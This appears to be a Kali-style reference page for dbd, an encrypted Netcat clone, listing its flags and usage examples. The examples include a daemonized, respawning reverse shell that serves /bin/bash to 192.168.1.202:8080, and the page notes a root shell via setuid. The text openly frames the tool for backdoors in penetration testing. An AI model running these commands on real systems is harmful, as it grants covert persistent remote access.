Exploitationnetcatencryptionbackdoortcpdaemonshell

dbd

dbd is a portable Netcat clone with strong AES-CBC-128 + HMAC-SHA1 encryption. It supports program execution, continuous reconnection, and daemon mode on Unix-like systems and Windows.

Description

dbd serves as an enhanced Netcat alternative focused on secure, encrypted TCP/IP communication. It is designed for portability across Unix-like operating systems and Microsoft Win32, featuring robust encryption via AES-CBC-128 combined with HMAC-SHA1. Key capabilities include executing programs post-connection, selecting source ports, and automatic reconnection with configurable delays, making it suitable for establishing persistent, secure tunnels or backdoors.

Common use cases involve creating encrypted reverse shells or listeners for remote access in penetration testing scenarios. The tool's daemonization and respawn options ensure reliability in unstable network environments, while verbose output aids in debugging connections. It operates exclusively over TCP/IP and is distributed under the GNU General Public License.

dbd emphasizes security through built-in encryption toggles and supports advanced features like immobility timeouts for idle operations, enhancing its utility in controlled, offensive security operations.

How It Works

dbd establishes TCP connections either by connecting to a remote host:port or listening on a specified port. Upon connection, it applies AES-CBC-128 encryption with HMAC-SHA1 for integrity if enabled (-c on). The -e option executes a program like /bin/bash, piping I/O through the encrypted channel. Respawn mode (-r n) retries connections indefinitely with a pause, while daemon mode (-D on) forks to background. It handles source/destination addresses, ports, and timeouts, with reverse DNS lookups on incoming connections.

Installation

bash

sudo apt install dbd

Flags

-llisten for incoming connection

-p nchoose port to listen on, or source port to connect out from

-a addresschoose an address to listen on or connect out from

-e progprogram to execute after connect (e.g. -e cmd.exe or -e bash)

-r ninfinitely respawn/reconnect, pause for n seconds between connection attempts. -r0 can be used to re-listen after disconnect (just like a regular daemon)

-c on|offencryption on/off. specify whether you want to use the built-in encryption

-sinvoke a shell, nothing else. if dbd is setuid 0, it'll invoke a root shell

-w n"immobility timeout" in seconds for idle read/write operations and program execution (the -e option)

-D on|offfork and run in background (daemonize). default: -D off

-vdisplay verbose output

Examples

On the client, respawn every 2400 seconds (-r 2400), run as a daemon (-D on), display verbose output (-v), and serve a bash shell (-e /bin/bash), connecting to the remote host 192.168.1.202 on port 8080.

dbd -r 2400 -D on -v -e /bin/bash 192.168.1.202 8080

On the server, listen for a connection (-l) on port 8080 (-p8080), and display verbose output (-v).

dbd -l -p8080 -v

Display help and usage information for dbd.

dbd -h

Connect (tcp) to a remote host and port with specified options.

dbd [-options] host port

Listen (tcp) on the specified port with options.

dbd -l -p port [-options]

Listen on port 8080 and re-listen after disconnect like a regular daemon using -r0.

dbd -r0 -l -p8080

Invoke a shell directly (root shell if setuid 0).

dbd -s

Updated 2026-04-16kali.org ↗